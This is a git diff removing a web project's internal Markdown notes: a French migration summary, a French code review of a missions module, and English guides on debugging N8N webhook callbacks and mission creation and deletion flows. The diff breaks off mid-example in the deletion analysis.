✅ Corrections Complétées - -### 1. Remplacement de fetch() par fetchWithTimeout() - -**Fichiers modifiés:** - -1. ✅ **lib/services/n8n-service.ts** - - `triggerMissionCreation()` - Timeout 30s - - `triggerMissionDeletion()` - Timeout 30s - - `triggerMissionRollback()` - Timeout 30s - -2. ✅ **app/api/missions/[missionId]/generate-plan/route.ts** - - Appel N8N webhook - Timeout 30s - -3. ✅ **app/api/users/[userId]/route.ts** - - Appels Leantime API - Timeout 10s - - Appels Keycloak API - Timeout 10s - - Forward delete request - Timeout 30s - -4. ✅ **app/api/rocket-chat/messages/route.ts** - - `getUserToken()` - Timeout 10s - - `users.list` - Timeout 10s - - `users.createToken` - Timeout 10s - - `subscriptions.get` - Timeout 10s - - Messages fetch - Timeout 10s - -5. ✅ **app/api/leantime/tasks/route.ts** - - `getLeantimeUserId()` - Timeout 10s - - Fetch tasks - Timeout 10s - -6. ✅ **app/api/news/route.ts** - - News API fetch - Timeout 10s (remplace AbortSignal.timeout) - -### 2. Remplacement de console.log par logger - -**Fichiers modifiés:** - -1. 
✅ **lib/services/rocketchat-call-listener.ts** (35 occurrences) - - Tous les `console.log` → `logger.debug` ou `logger.info` - - Tous les `console.error` → `logger.error` - - Tous les `console.warn` → `logger.warn` - -2. ✅ **app/api/users/[userId]/route.ts** - - Tous les `console.log/error` → `logger.debug/error` - -3. ✅ **app/api/rocket-chat/messages/route.ts** - - Tous les `console.error` → `logger.error` - -### 3. Configuration DATABASE_URL - -**Documentation créée:** -- ✅ `DATABASE_URL_UPDATE.md` - Instructions pour modifier le .env -- ✅ `scripts/update-database-url.sh` - Script automatique - -**Action requise:** -Modifier manuellement le fichier `.env` : - -```env -# Avant -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public" - -# Après -DATABASE_URL="postgresql://postgres:postgres@localhost:5432/calendar_db?schema=public&connection_limit=10&pool_timeout=20&connect_timeout=10" -``` - -Ou exécuter le script : -```bash -bash scripts/update-database-url.sh -``` - -## 📊 Statistiques - -- **Fichiers modifiés:** 7 fichiers -- **fetch() remplacés:** 15+ occurrences -- **console.log remplacés:** 40+ occurrences -- **Timeouts ajoutés:** 15+ requêtes HTTP - -## 🔍 Fichiers Restants (Optionnel) - -Il reste quelques fichiers avec `console.log` qui peuvent être migrés plus tard : - -- `lib/services/microsoft-oauth.ts` -- `lib/services/caldav-sync.ts` -- `lib/services/email-service.ts` -- `lib/services/token-refresh.ts` -- `lib/services/refresh-manager.ts` -- `lib/services/prefetch-service.ts` -- Divers fichiers dans `app/api/` (moins critiques) - -Ces fichiers peuvent être migrés progressivement selon les besoins. - -## ✅ Tests Recommandés - -1. **Tester les timeouts:** - ```bash - # Vérifier que les requêtes timeout correctement - # Simuler une API lente et vérifier les logs - ``` - -2. **Tester la connexion DB:** - ```bash - npm run validate:env - npx prisma db execute --stdin <<< "SELECT 1" - ``` - -3. **Vérifier les logs:** - - S'assurer que tous les logs utilisent maintenant `logger` - - Vérifier que les logs sont structurés correctement - -## 📝 Notes - -- Tous les timeouts sont configurés selon le contexte : - - **10 secondes** pour les API rapides (Leantime, Keycloak, RocketChat) - - **30 secondes** pour les webhooks N8N (peuvent être plus longs) -- Les logs sont maintenant structurés avec des objets au lieu de strings concaténées -- Les erreurs incluent maintenant le contexte nécessaire pour le debugging - -## 🚀 Prochaines Étapes - -1. ✅ Modifier le `.env` avec les paramètres de pool DB -2. ✅ Tester l'application en développement -3. ✅ Vérifier que tous les timeouts fonctionnent correctement -4. ✅ Déployer en staging pour tests -5. ✅ Monitorer les performances en production - ---- - -**Date de migration:** $(date) -**Statut:** ✅ Complété pour les fichiers critiques diff --git a/MISSIONS_CODE_REVIEW.md b/MISSIONS_CODE_REVIEW.md deleted file mode 100644 index cf5d38a..0000000 --- a/MISSIONS_CODE_REVIEW.md +++ /dev/null @@ -1,503 +0,0 @@ -# Analyse approfondie du système Missions - Code Review Senior - -## 📋 Vue d'ensemble - -Ce document présente une analyse complète du système de gestion des missions, incluant la page de liste, les détails de mission, et l'architecture backend associée. 
- ---- - -## 🏗️ Architecture générale - -### Structure des fichiers - -``` -app/ -├── missions/ -│ ├── page.tsx # Page principale de liste des missions -│ ├── layout.tsx # Layout avec sidebar CAP -│ ├── new/ -│ │ └── page.tsx # Création de nouvelle mission -│ └── [missionId]/ -│ ├── page.tsx # Page de détails de mission -│ └── edit/ -│ └── page.tsx # Édition de mission -│ -├── api/ -│ └── missions/ -│ ├── route.ts # GET/POST missions -│ ├── [missionId]/ -│ │ ├── route.ts # GET/PUT/DELETE mission spécifique -│ │ ├── close/route.ts # Clôture de mission -│ │ └── generate-plan/ # Génération plan d'action IA -│ └── ... -│ -components/ -└── missions/ - ├── missions-frame.tsx # Iframe wrapper - ├── missions-admin-panel.tsx # Panel de création/édition - └── ... -``` - ---- - -## 📄 Page de liste des missions (`app/missions/page.tsx`) - -### Points forts ✅ - -1. **Interface utilisateur claire** - - Design en grille responsive (1/2/3 colonnes) - - Cartes de mission bien structurées - - Indicateurs visuels pour missions clôturées - - Recherche en temps réel - -2. **Gestion d'état** - - Utilisation appropriée de `useState` et `useEffect` - - Gestion des états de chargement - - Filtrage côté client efficace - -3. **Affichage des données** - - Logos avec fallback gracieux - - Badges ODD avec icônes - - Affichage conditionnel des services - - Formatage des dates en français - -### Points d'amélioration 🔧 - -1. **Performance** - ```typescript - // ❌ Problème: Filtrage côté client uniquement - const filteredMissions = missions.filter(mission => - mission.name.toLowerCase().includes(searchTerm.toLowerCase()) || ... - ); - - // ✅ Suggestion: Pagination et recherche côté serveur - // Utiliser les query params dans l'API - ``` - -2. **Gestion d'erreurs** - ```typescript - // ⚠️ Actuel: Toast générique - toast({ - title: "Erreur", - description: "Impossible de charger les missions", - variant: "destructive", - }); - - // ✅ Suggestion: Messages d'erreur plus spécifiques - // + Retry automatique pour erreurs réseau - ``` - -3. **Console.log en production** - ```typescript - // ❌ Lignes 59, 199-203: console.log en production - console.log("Mission data with intention:", data.missions); - - // ✅ Suggestion: Utiliser un logger conditionnel - if (process.env.NODE_ENV === 'development') { - console.log(...); - } - ``` - -4. **Accessibilité** - - Manque d'attributs ARIA sur les cartes - - Navigation clavier non optimisée - - Pas de skip links - ---- - -## 📄 Page de détails de mission (`app/missions/[missionId]/page.tsx`) - -### Points forts ✅ - -1. **Architecture en onglets** - - Organisation claire: Général, Plan d'actions, Équipe, Ressources - - Compteurs visuels sur les onglets (équipe, documents) - - Navigation intuitive - -2. **Fonctionnalités avancées** - - Génération de plan d'action par IA (N8N) - - Édition inline du plan avec sauvegarde - - Gestion des gardiens de l'intention - - Clôture de mission avec intégration N8N - -3. **Gestion d'état complexe** - - Suivi des modifications non sauvegardées - - États de chargement multiples (generating, saving, deleting, closing) - - Synchronisation avec le backend - -### Points d'amélioration critiques 🔴 - -1. **Sécurité - Validation côté client uniquement** - ```typescript - // ⚠️ Ligne 192: Confirmation simple avec confirm() - if (!confirm("Êtes-vous sûr de vouloir supprimer cette mission ?")) { - return; - } - - // ✅ Suggestion: Modal de confirmation avec détails - // + Vérification des permissions côté serveur (déjà fait ✅) - ``` - -2. 
**Gestion des erreurs réseau** - ```typescript - // ⚠️ Pas de retry automatique - // Pas de gestion des timeouts - // Pas de fallback si l'API est down - - // ✅ Suggestion: Implémenter retry avec exponential backoff - // + Cache local pour données critiques - ``` - -3. **Performance - Re-renders inutiles** - ```typescript - // ⚠️ Ligne 112-116: useEffect qui se déclenche à chaque changement - useEffect(() => { - if (mission) { - setIsPlanModified(editedPlan !== (mission.actionPlan || "")); - } - }, [editedPlan, mission]); - - // ✅ Suggestion: Utiliser useMemo pour éviter recalculs - const isPlanModified = useMemo(() => { - return mission ? editedPlan !== (mission.actionPlan || "") : false; - }, [editedPlan, mission?.actionPlan]); - ``` - -4. **Textarea auto-resize - Code fragile** - ```typescript - // ⚠️ Lignes 676-688: Manipulation directe du DOM - e.target.style.height = 'auto'; - e.target.style.height = e.target.scrollHeight + 'px'; - - // ✅ Suggestion: Utiliser une librairie dédiée (react-textarea-autosize) - // ou un hook personnalisé réutilisable - ``` - -5. **Duplication de code** - ```typescript - // ⚠️ Fonctions helper dupliquées entre page.tsx et [missionId]/page.tsx - // getMissionTypeLabel, getDurationLabel, getNiveauLabel, etc. - - // ✅ Suggestion: Extraire dans lib/mission-helpers.ts - ``` - ---- - -## 🔌 API Routes - Analyse Backend - -### `app/api/missions/route.ts` (GET/POST) - -#### Points forts ✅ - -1. **Sécurité** - - Vérification d'authentification systématique - - Validation des champs requis - - Gestion des permissions - -2. **Gestion des fichiers** - - Upload vers Minio/S3 bien structuré - - Vérification d'existence des fichiers avant N8N - - Cleanup en cas d'erreur (lignes 460-474) - -3. **Intégration N8N** - - Workflow asynchrone pour création - - Gestion des erreurs non-bloquantes - - Logging détaillé - -#### Points d'amélioration 🔧 - -1. **Transaction database** - ```typescript - // ⚠️ Pas de transaction Prisma - const mission = await prisma.mission.create({...}); - await prisma.missionUser.createMany({...}); - - // ✅ Suggestion: Utiliser $transaction pour atomicité - await prisma.$transaction(async (tx) => { - const mission = await tx.mission.create({...}); - await tx.missionUser.createMany({...}); - return mission; - }); - ``` - -2. **Validation des données** - ```typescript - // ⚠️ Validation basique (lignes 230-235) - if (!body.name || !body.oddScope) { - return NextResponse.json({ error: 'Missing required fields' }, { status: 400 }); - } - - // ✅ Suggestion: Utiliser Zod ou Yup pour validation stricte - const MissionSchema = z.object({ - name: z.string().min(3).max(100), - oddScope: z.array(z.string().regex(/^odd-\d+$/)), - // ... - }); - ``` - -3. **Gestion des erreurs N8N** - ```typescript - // ⚠️ Ligne 439: Erreur N8N bloque la création - if (!workflowResult.success) { - throw new Error(workflowResult.error || 'N8N workflow failed'); - } - - // ✅ Suggestion: Mode "best effort" - créer la mission même si N8N échoue - // + Queue de retry pour N8N (BullMQ, etc.) - ``` - -### `app/api/missions/[missionId]/route.ts` (GET/PUT/DELETE) - -#### Points forts ✅ - -1. **DELETE bien implémenté** - - Cleanup Minio avant suppression DB - - Intégration N8N pour rollback - - Gestion des erreurs non-bloquantes - -2. **Permissions granulaires** - - Vérification créateur/admin pour DELETE - - Gardiens peuvent modifier (PUT) - -#### Points d'amélioration 🔧 - -1. 
**GET - Performance**
-   ```typescript
-   // ⚠️ Ligne 38: findFirst au lieu de findUnique
-   const mission = await (prisma as any).mission.findFirst({
-     where: {
-       id: missionId,
-       OR: [
-         { creatorId: userId },
-         { missionUsers: { some: { userId } } }
-       ]
-     },
-     // ...
-   });
-
-   // ✅ Suggestion: findUnique + vérification permissions séparée
-   // Plus performant avec index sur id
-   ```
-
-2. **PUT - Validation partielle**
-   ```typescript
-   // ⚠️ Pas de validation des données mises à jour
-   // Pas de vérification de cohérence (ex: oddScope doit être array)
-
-   // ✅ Suggestion: Validation stricte avec schéma
-   ```
-
----
-
-## 🎨 Composants UI
-
-### `components/missions/missions-admin-panel.tsx`
-
-#### Points forts ✅
-
-1. **Interface complète**
-   - Formulaire multi-onglets bien organisé
-   - Gestion des gardiens et volontaires
-   - Upload de fichiers intégré
-
-2. **UX soignée**
-   - Validation en temps réel
-   - Indicateurs visuels de progression
-   - Messages d'erreur contextuels
-
-#### Points d'amélioration critiques 🔴
-
-1. **Fichier trop volumineux (1570 lignes)**
-   ```typescript
-   // ❌ Un seul composant fait tout
-   // Difficile à maintenir, tester, et réutiliser
-
-   // ✅ Suggestion: Découper en sous-composants
-   // - MissionGeneralForm
-   // - MissionDetailsForm
-   // - MissionAttachmentsForm
-   // - MissionMembersForm
-   // - MissionSkillsForm
-   ```
-
-2. **Gestion d'état complexe**
-   ```typescript
-   // ⚠️ Trop de useState (15+)
-   const [selectedServices, setSelectedServices] = useState([]);
-   const [selectedProfils, setSelectedProfils] = useState([]);
-   // ... 13 autres
-
-   // ✅ Suggestion: Utiliser useReducer ou Zustand
-   const [state, dispatch] = useReducer(missionReducer, initialState);
-   ```
-
-3. **Logique métier dans le composant**
-   ```typescript
-   // ⚠️ Lignes 400-408: Conversion base64 dans le composant
-   const convertFileToBase64 = (file: File): Promise<string> => {
-     // ...
-   };
-
-   // ✅ Suggestion: Extraire dans lib/file-utils.ts
-   ```
-
-4. **Console.log en production**
-   ```typescript
-   // ❌ Lignes 412, 422, 428, 451, 465, 492, 504, 514, 541, 559
-   // Trop de logs de debug
-
-   // ✅ Suggestion: Logger conditionnel ou supprimer
-   ```
-
----
-
-## 🔄 Flux de données
-
-### Création de mission
-
-```
-1. User remplit formulaire (missions-admin-panel.tsx)
-   ↓
-2. POST /api/missions
-   ↓
-3. Création DB (Prisma)
-   ↓
-4. Upload fichiers (Minio)
-   ↓
-5. Vérification fichiers
-   ↓
-6. Trigger N8N workflow
-   ↓
-7. N8N crée intégrations (Gitea, Leantime, etc.)
-   ↓
-8. Callback /api/missions/mission-created
-   ↓
-9. Mise à jour mission avec IDs externes
-```
-
-**Problème potentiel**: Si N8N échoue après création DB, la mission existe sans intégrations.
-
-**Solution**: Queue de retry ou mode "best effort" avec notification.
-
-### Affichage de mission
-
-```
-1. GET /api/missions/[missionId]
-   ↓
-2. Prisma query avec includes
-   ↓
-3. Génération URLs publiques (logo, attachments)
-   ↓
-4. Affichage dans page.tsx
-```
-
-**Optimisation possible**: Cache Redis pour missions fréquemment consultées.
-
----
-
-## 🐛 Bugs potentiels identifiés
-
-1. **Race condition sur plan d'action**
-   ```typescript
-   // Si l'utilisateur modifie pendant la génération
-   // Les modifications peuvent être écrasées
-   ```
-
-2. **Memory leak potentiel**
-   ```typescript
-   // Textarea auto-resize avec ref callback
-   // Pas de cleanup dans useEffect
-   ```
-
-3.
**Type safety** - ```typescript - // Utilisation de (prisma as any) dans plusieurs endroits - // Indique que le schema Prisma n'est pas à jour - ``` - ---- - -## 📊 Métriques de code - -### Complexité cyclomatique - -- `missions-admin-panel.tsx`: **Très élevée** (>50) -- `[missionId]/page.tsx`: **Élevée** (~30) -- `page.tsx`: **Moyenne** (~15) - -### Taille des fichiers - -- `missions-admin-panel.tsx`: **1570 lignes** ⚠️ -- `[missionId]/page.tsx`: **920 lignes** ⚠️ -- `route.ts` (POST): **480 lignes** ⚠️ - -**Recommandation**: Découper les fichiers >500 lignes. - ---- - -## ✅ Recommandations prioritaires - -### 🔴 Critique (À faire immédiatement) - -1. **Sécurité** - - Ajouter validation stricte avec Zod - - Implémenter rate limiting sur API - - Ajouter CSRF protection - -2. **Performance** - - Implémenter pagination côté serveur - - Ajouter cache Redis - - Optimiser les requêtes Prisma (select spécifiques) - -3. **Maintenabilité** - - Découper `missions-admin-panel.tsx` - - Extraire helpers dans lib/ - - Supprimer console.log de production - -### 🟡 Important (À planifier) - -1. **Tests** - - Unit tests pour helpers - - Integration tests pour API routes - - E2E tests pour flux critiques - -2. **Documentation** - - JSDoc pour fonctions complexes - - Diagrammes de séquence pour flux N8N - - Guide de contribution - -3. **Monitoring** - - Sentry pour erreurs frontend - - Logging structuré backend - - Métriques de performance - -### 🟢 Amélioration (Nice to have) - -1. **UX** - - Optimistic updates - - Skeleton loaders - - Animations de transition - -2. **Accessibilité** - - ARIA labels complets - - Navigation clavier - - Support lecteurs d'écran - ---- - -## 🎯 Conclusion - -Le système de missions est **fonctionnel et bien structuré** avec une architecture claire. Les principales améliorations à apporter concernent: - -1. **Maintenabilité**: Découpage des gros composants -2. **Performance**: Optimisation des requêtes et pagination -3. **Robustesse**: Meilleure gestion d'erreurs et retry logic -4. **Sécurité**: Validation stricte et rate limiting - -Le code montre une bonne compréhension de Next.js, Prisma, et des patterns React modernes. Avec les améliorations suggérées, le système sera prêt pour la production à grande échelle. - ---- - -**Date de review**: $(date) -**Reviewer**: Senior Developer -**Version analysée**: Current codebase diff --git a/MISSION_CREATION_CALLBACK_MISSING.md b/MISSION_CREATION_CALLBACK_MISSING.md deleted file mode 100644 index 53dc0b0..0000000 --- a/MISSION_CREATION_CALLBACK_MISSING.md +++ /dev/null @@ -1,198 +0,0 @@ -# Mission Creation - N8N Callback Not Being Called - -## 🔍 Problem Analysis - -From your logs, I can see: - -### ✅ What's Working - -1. **Mission created in database** ✅ - ``` - Mission created successfully { missionId: '5815440f-af1c-4c6a-bfa6-92f06058f9c8', name: 'bbc' } - ``` - -2. **N8N workflow triggered** ✅ - ``` - Starting N8N workflow - POST /mission-created 200 in 851ms ← This is N8N RECEIVING the webhook - ``` - -3. **N8N workflow completes** ✅ - ``` - N8N workflow result { success: true, hasError: false } - ``` - -### ❌ What's Missing - -**NO log from `/api/missions/mission-created` endpoint!** - -Expected log (but NOT present): -``` -Mission Created Webhook Received ← This should appear but doesn't -``` - -**This means**: N8N workflow is **NOT calling** `/api/missions/mission-created` to save the integration IDs. - ---- - -## 🔍 Root Cause - -The N8N workflow completes successfully, but the **"Save Mission To API" node** is either: -1. 
❌ Not configured correctly (wrong URL) -2. ❌ Not executing (node disabled or failing silently) -3. ❌ Failing but not blocking the workflow (continueOnFail: true) - ---- - -## ✅ Solution: Verify N8N "Save Mission To API" Node - -### Step 1: Check N8N Execution Logs - -1. Go to N8N → Executions -2. Find the latest mission creation execution -3. Click on it to see the execution details -4. **Look for "Save Mission To API" node**: - - ✅ Is it executed? - - ✅ What's the status (success/error)? - - ✅ What URL is it calling? - - ✅ What's the response? - -### Step 2: Verify Node Configuration - -**In N8N workflow, check "Save Mission To API" node**: - -1. **URL should be**: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL }}/api/missions/mission-created - ``` - - **NOT**: - ``` - {{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }} - ``` - -2. **Method**: `POST` - -3. **Headers**: - - `Content-Type`: `application/json` - - `x-api-key`: `{{ $node['Process Mission Data'].json.config.N8N_API_KEY }}` - -4. **Body Parameters** should include: - - `missionId`: `{{ $node['Process Mission Data'].json.missionId }}` - - `gitRepoUrl`: `{{ $node['Combine Results'].json.gitRepo?.html_url || '' }}` - - `leantimeProjectId`: `{{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}` - - `documentationCollectionId`: `{{ $node['Combine Results'].json.docCollection?.data?.id || '' }}` - - `rocketchatChannelId`: `{{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}` - - `name`: `{{ $node['Process Mission Data'].json.missionProcessed.name }}` - - `creatorId`: `{{ $node['Process Mission Data'].json.creatorId }}` - -5. **Node Options**: - - ❌ Should NOT have `continueOnFail: true` (or it will fail silently) - - ✅ Should be set to fail the workflow if it fails - -### Step 3: Test the Endpoint Manually - -**Test if the endpoint is accessible**: - -```bash -curl -X POST https://hub.slm-lab.net/api/missions/mission-created \ - -H "Content-Type: application/json" \ - -H "x-api-key: YOUR_N8N_API_KEY" \ - -d '{ - "missionId": "5815440f-af1c-4c6a-bfa6-92f06058f9c8", - "name": "bbc", - "creatorId": "203cbc91-61ab-47a2-95d2-b5e1159327d7", - "gitRepoUrl": "https://gite.slm-lab.net/alma/test", - "leantimeProjectId": "123", - "documentationCollectionId": "collection-456", - "rocketchatChannelId": "channel-789" - }' -``` - -**Expected**: 200 OK with updated mission data - -**If 500 error**: `N8N_API_KEY` is not set in environment - -**If 404 error**: Wrong URL - -**If 401 error**: Wrong API key - ---- - -## 🔧 Common Issues - -### Issue 1: Wrong URL in N8N - -**Symptom**: Node fails with 404 error - -**Fix**: Change URL from: -``` -{{ MISSION_API_URL + '/mission-created' }} -``` - -To: -``` -{{ MISSION_API_URL }}/api/missions/mission-created -``` - -### Issue 2: Missing missionId in Body - -**Symptom**: Endpoint can't find mission (404) - -**Fix**: Add `missionId` parameter to body: -- Name: `missionId` -- Value: `{{ $node['Process Mission Data'].json.missionId }}` - -### Issue 3: continueOnFail: true - -**Symptom**: Node fails but workflow continues (no error visible) - -**Fix**: Remove `continueOnFail: true` or set to `false` - -### Issue 4: N8N_API_KEY Not Set - -**Symptom**: Endpoint returns 500 "Server configuration error" - -**Fix**: Add `N8N_API_KEY` to environment variables - ---- - -## 📋 Debugging Checklist - -- [ ] Check N8N execution logs for "Save Mission To API" node -- [ ] Verify node URL is correct: `{{ MISSION_API_URL 
}}/api/missions/mission-created` -- [ ] Verify node includes `missionId` in body -- [ ] Verify node includes `x-api-key` header -- [ ] Check if node has `continueOnFail: true` (should be false) -- [ ] Test endpoint manually with curl -- [ ] Verify `N8N_API_KEY` is set in environment -- [ ] Check server logs for any calls to `/api/missions/mission-created` - ---- - -## 🎯 Expected Flow - -``` -1. Mission created in database ✅ -2. N8N workflow triggered ✅ -3. N8N creates integrations ✅ -4. N8N calls /api/missions/mission-created ⚠️ (MISSING) -5. IDs saved to database ⚠️ (NOT HAPPENING) -6. Mission has integration IDs ⚠️ (ALL NULL) -``` - ---- - -## 📝 Next Steps - -1. **Check N8N execution logs** to see what "Save Mission To API" node is doing -2. **Verify node configuration** matches the requirements above -3. **Test endpoint manually** to ensure it's accessible -4. **Fix any configuration issues** found -5. **Re-test mission creation** and verify IDs are saved - ---- - -**Document Created**: $(date) -**Status**: N8N workflow completes but callback to save IDs is not being called - diff --git a/MISSION_CREATION_FLOW_EXPLANATION.md b/MISSION_CREATION_FLOW_EXPLANATION.md deleted file mode 100644 index 17da30b..0000000 --- a/MISSION_CREATION_FLOW_EXPLANATION.md +++ /dev/null @@ -1,348 +0,0 @@ -# Mission Creation Flow - Why You Can Create Without N8N API Key - -## 🔍 Current Behavior Explained - -You're absolutely right! You **CAN** create missions without `N8N_API_KEY` because of how the code is structured. - ---- - -## 📋 Current Flow Order - -Looking at `app/api/missions/route.ts`, here's the **actual execution order**: - -``` -1. ✅ Create mission in database (line 260) - ↓ -2. ✅ Create mission users (line 298) - ↓ -3. ✅ Upload logo to Minio (line 318) - ↓ -4. ✅ Upload attachments to Minio (line 362) - ↓ -5. ✅ Verify files exist (line 391) - ↓ -6. ⚠️ Trigger N8N workflow (line 430) - ↓ -7. ❌ If N8N fails → Error thrown (line 437) - ↓ -8. ⚠️ Error caught → Cleanup files (line 458) - ↓ -9. ❌ Return 500 error BUT mission stays in database! -``` - ---- - -## 🎯 The Problem - -### What Happens When N8N Fails - -1. **Mission is created** in database (line 260) ✅ -2. **Files are uploaded** to Minio ✅ -3. **N8N is called** but fails (no API key, webhook not registered, etc.) ❌ -4. **Error is thrown** (line 437) ❌ -5. **Files are cleaned up** (line 458) ✅ -6. **500 error is returned** to frontend ❌ -7. **BUT: Mission remains in database!** ⚠️ - -### Result - -- ✅ Mission exists in database -- ❌ No integration IDs saved (N8N never called `/mission-created`) -- ❌ Files deleted from Minio (cleanup) -- ❌ Frontend shows error -- ⚠️ **Orphaned mission in database** - ---- - -## 🔍 Code Analysis - -### Step 1: Mission Created (Line 260) - -```typescript -const mission = await prisma.mission.create({ - data: missionData -}); -``` - -**This happens FIRST**, before N8N is even called. - -### Step 2: N8N Called (Line 430) - -```typescript -const workflowResult = await n8nService.triggerMissionCreation(n8nData); - -if (!workflowResult.success) { - throw new Error(workflowResult.error || 'N8N workflow failed'); -} -``` - -**If N8N fails**, an error is thrown. - -### Step 3: Error Handling (Line 445-477) - -```typescript -} catch (error) { - logger.error('Error in final verification or n8n', { - error: error instanceof Error ? 
error.message : String(error) - }); - throw error; // Re-throws to outer catch -} - -// Outer catch (line 451) -} catch (error) { - // Cleanup files - for (const file of uploadedFiles) { - await s3Client.send(new DeleteObjectCommand({...})); - } - - return NextResponse.json({ - error: 'Failed to create mission', - details: error instanceof Error ? error.message : String(error) - }, { status: 500 }); -} -``` - -**Notice**: The outer catch block: -- ✅ Cleans up files from Minio -- ❌ **Does NOT delete the mission from database** -- ❌ Returns 500 error - ---- - -## ⚠️ Why This Is a Problem - -### Scenario: N8N Fails (No API Key) - -1. User creates mission -2. Mission saved to database ✅ -3. Files uploaded to Minio ✅ -4. N8N called → Fails (no API key) ❌ -5. Error thrown -6. Files cleaned up ✅ -7. **Mission still in database** ⚠️ -8. Frontend shows error -9. User sees error but mission exists -10. **Mission has no integration IDs** (N8N never saved them) - -### Result - -- **Orphaned missions** in database without integration IDs -- **Inconsistent state**: Mission exists but integrations don't -- **Deletion won't work**: No IDs to send to N8N deletion workflow - ---- - -## ✅ Solutions - -### Solution 1: Make N8N Optional (Current Behavior - But Better Error Handling) - -**Keep current flow but improve error handling**: - -```typescript -// After N8N call -if (!workflowResult.success) { - logger.warn('N8N workflow failed, but mission created', { - error: workflowResult.error, - missionId: mission.id - }); - // Don't throw error - mission is created, N8N is optional - // Return success but with warning - return NextResponse.json({ - success: true, - mission, - warning: 'Mission created but integrations may not be set up', - n8nError: workflowResult.error - }); -} -``` - -**Pros**: -- Mission creation succeeds even if N8N fails -- User gets feedback about partial success - -**Cons**: -- Mission exists without integration IDs -- Deletion won't work properly - -### Solution 2: Delete Mission If N8N Fails (Strict) - -**Delete mission if N8N fails**: - -```typescript -} catch (error) { - logger.error('Error in final verification or n8n', { - error: error instanceof Error ? error.message : String(error) - }); - - // Delete mission if N8N fails - try { - await prisma.mission.delete({ - where: { id: mission.id } - }); - logger.debug('Mission deleted due to N8N failure', { missionId: mission.id }); - } catch (deleteError) { - logger.error('Failed to delete mission after N8N failure', { - missionId: mission.id, - error: deleteError - }); - } - - throw error; -} -``` - -**Pros**: -- No orphaned missions -- Consistent state - -**Cons**: -- Mission creation fails completely if N8N is down -- User loses all work if N8N has issues - -### Solution 3: Make N8N Non-Blocking (Recommended) - -**Don't throw error if N8N fails, just log it**: - -```typescript -const workflowResult = await n8nService.triggerMissionCreation(n8nData); - -if (!workflowResult.success) { - logger.warn('N8N workflow failed, but continuing', { - error: workflowResult.error, - missionId: mission.id - }); - // Don't throw - mission is created, N8N can be retried later -} - -return NextResponse.json({ - success: true, - mission, - message: workflowResult.success - ? 
'Mission created successfully with all integrations' - : 'Mission created but integrations may need to be set up manually' -}); -``` - -**Pros**: -- Mission creation succeeds -- User gets clear feedback -- Can retry N8N later - -**Cons**: -- Mission may exist without integration IDs -- Need manual retry mechanism - -### Solution 4: Transaction-Based (Best But Complex) - -**Use database transaction and rollback if N8N fails**: - -```typescript -const result = await prisma.$transaction(async (tx) => { - // Create mission - const mission = await tx.mission.create({...}); - - // Upload files - // ... - - // Try N8N - const workflowResult = await n8nService.triggerMissionCreation(n8nData); - - if (!workflowResult.success) { - throw new Error('N8N workflow failed'); - } - - return mission; -}); -``` - -**Pros**: -- Atomic operation -- No orphaned missions - -**Cons**: -- Complex to implement -- Files already uploaded (can't rollback Minio in transaction) - ---- - -## 🎯 Recommended Approach - -**Hybrid Solution**: Make N8N non-blocking but add retry mechanism - -```typescript -// After N8N call -if (!workflowResult.success) { - logger.warn('N8N workflow failed, mission created without integrations', { - error: workflowResult.error, - missionId: mission.id - }); - - // Mission is created, but mark it for retry - await prisma.mission.update({ - where: { id: mission.id }, - data: { - // Add a flag to indicate N8N needs retry - // Or just log it and handle manually - } - }); -} - -return NextResponse.json({ - success: true, - mission, - message: workflowResult.success - ? 'Mission created successfully with all integrations' - : 'Mission created. Integrations will be set up shortly.' -}); -``` - ---- - -## 📊 Current vs Recommended - -### Current Behavior -- ✅ Mission created even if N8N fails -- ❌ No integration IDs saved -- ❌ Deletion won't work -- ❌ Orphaned missions - -### Recommended Behavior -- ✅ Mission created even if N8N fails -- ⚠️ Integration IDs may be missing (but can be retried) -- ✅ User gets clear feedback -- ✅ Can retry N8N later - ---- - -## 🔧 Quick Fix - -If you want to keep current behavior but improve it: - -**Change line 436-438** from: -```typescript -if (!workflowResult.success) { - throw new Error(workflowResult.error || 'N8N workflow failed'); -} -``` - -**To**: -```typescript -if (!workflowResult.success) { - logger.warn('N8N workflow failed, but mission created', { - error: workflowResult.error, - missionId: mission.id - }); - // Continue - mission is created, N8N can be retried -} -``` - -This way: -- ✅ Mission creation succeeds -- ⚠️ User gets warning about integrations -- ✅ Can manually trigger N8N later or add retry mechanism - ---- - -**Document Created**: $(date) -**Issue**: Mission creation succeeds even when N8N fails, leading to orphaned missions without integration IDs - diff --git a/MISSION_DELETION_FLOW_ANALYSIS.md b/MISSION_DELETION_FLOW_ANALYSIS.md deleted file mode 100644 index feb5eb5..0000000 --- a/MISSION_DELETION_FLOW_ANALYSIS.md +++ /dev/null @@ -1,313 +0,0 @@ -# Mission Deletion Flow - Complete Analysis from Logs - -## 🔍 Analysis of Your Deletion Flow - -Based on your logs, here's what's happening: - ---- - -## ✅ What's Working - -1. **Mission is fetched correctly** ✅ - ``` - SELECT "public"."Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' - ``` - -2. **Attachments are fetched** ✅ - ``` - SELECT "public"."Attachment" WHERE "missionId" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' - ``` - -3. 
**N8N deletion workflow is called** ✅ - ``` - Starting N8N deletion workflow - Triggering n8n mission deletion workflow - ``` - -4. **N8N responds successfully** ✅ - ``` - Deletion webhook response { status: 200 } - Parsed deletion workflow result { success: true, hasError: false } - ``` - -5. **Mission is deleted from database** ✅ - ``` - DELETE FROM "public"."Mission" WHERE "id" = '805c1d8c-1bd4-41e7-9cf1-d22631dae260' - Mission deleted successfully from database - ``` - ---- - -## ❌ Critical Problems - -### Problem 1: N8N_API_KEY Not Set - -``` -N8N_API_KEY is not set in environment variables -API key present { present: false } -``` - -**Impact**: N8N workflow runs but may not have proper authentication. - -### Problem 2: All Integration IDs Are NULL/Empty - -**What N8N Receives**: -```json -{ - "missionId": "805c1d8c-1bd4-41e7-9cf1-d22631dae260", - "name": "libra", - "repoName": "", // ❌ EMPTY - "leantimeProjectId": 0, // ❌ ZERO - "documentationCollectionId": "", // ❌ EMPTY - "rocketchatChannelId": "", // ❌ EMPTY - "giteaRepositoryUrl": null, // ❌ NULL - "outlineCollectionId": null, // ❌ NULL - "rocketChatChannelId": null, // ❌ NULL - 